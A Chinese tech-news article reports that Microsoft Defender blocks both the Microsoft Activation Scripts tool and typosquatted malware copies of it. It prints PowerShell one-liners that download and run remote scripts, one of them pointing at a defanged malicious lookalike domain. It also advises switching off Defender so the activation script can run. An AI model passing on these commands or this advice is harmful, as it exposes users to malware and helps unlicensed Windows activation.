微软Defender在恶意软件大战中拦截了官方MAS脚本

业界 来源:securityonline 2026-01-14 04:49:05

微软显然已意识到微软激活脚本(MAS)这一广受欢迎的开源工具;此外,该公司似乎也清楚地了解到,有恶意行为者正在注册虚假域名,以MAS的名义传播恶意软件。因此,微软已部署 Microsoft Defender将自主拦截这些欺诈性激活工具。

遗憾的是,微软的过滤逻辑中出现了一处异常:原本真实的MAS实用工具如今却被这些防御措施误判为可疑对象。因此,用户尝试通过PowerShell执行激活命令时,会遭遇突如其来的错误。人们不禁要问,这是否是一场蓄意打压正版工具的行动;然而,Microsoft Defender中的日志记录显示将该威胁定性为。鉴于有关这些伪造脚本的报告近期才浮出水面——且已得到MAS开发团队在社交媒体上的证实——微软的意图很可能是为了遏制仿冒品,而非原版。

合法脚本与其恶意对应版本之间的区别,取决于域名中的一个字符:

真正的MAS命令位于: irm https://get.activated.win | iex

被篡改的版本省略了字母‘d’: irm hxxps://get.activate.win | iex

微软似乎无意中将合法域名列入了黑名单。尽管缺乏虚拟测试环境,无法立即验证网络钓鱼版本是否已被成功拦截,但如果安全  软件竟然放过了恶意软件,却阻止了无害的原始版本,那可真是个莫大的讽刺。

当前的困境要求,由于Microsoft Defender默认已启用,用户必须导航至安全中心,暂时禁用这些防护措施,然后再继续激活。流程完成后,应立即重新启用各项防御层。

必须特别强调,务必对域名保持高度警惕。如果在禁用安全协议的同时执行网络钓鱼脚本,系统将毫无防护地暴露于恶意软件的威胁之下,这可能导致灾难性的数据泄露或其他安全漏洞。

延伸阅读
  • 攻击者利用伪造PDF文件将合法RMM工具武器化

    在一份新报告中,安랩安全情报中心(ASEC)警告称,一种日益增长的趋势正在显现:威胁行为者正劫持功能强大的远程监控与管理(RMM)软件,以渗透受害者网络。通过滥用Syncro、SuperOps、Nin

关注公众号:拾黑(shiheibook)了解更多

赞助链接:

关注数据与安全,洞悉企业级服务市场:https://www.ijiandao.com/
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

公众号 关注网络尖刀微信公众号
随时掌握互联网精彩
赞助链接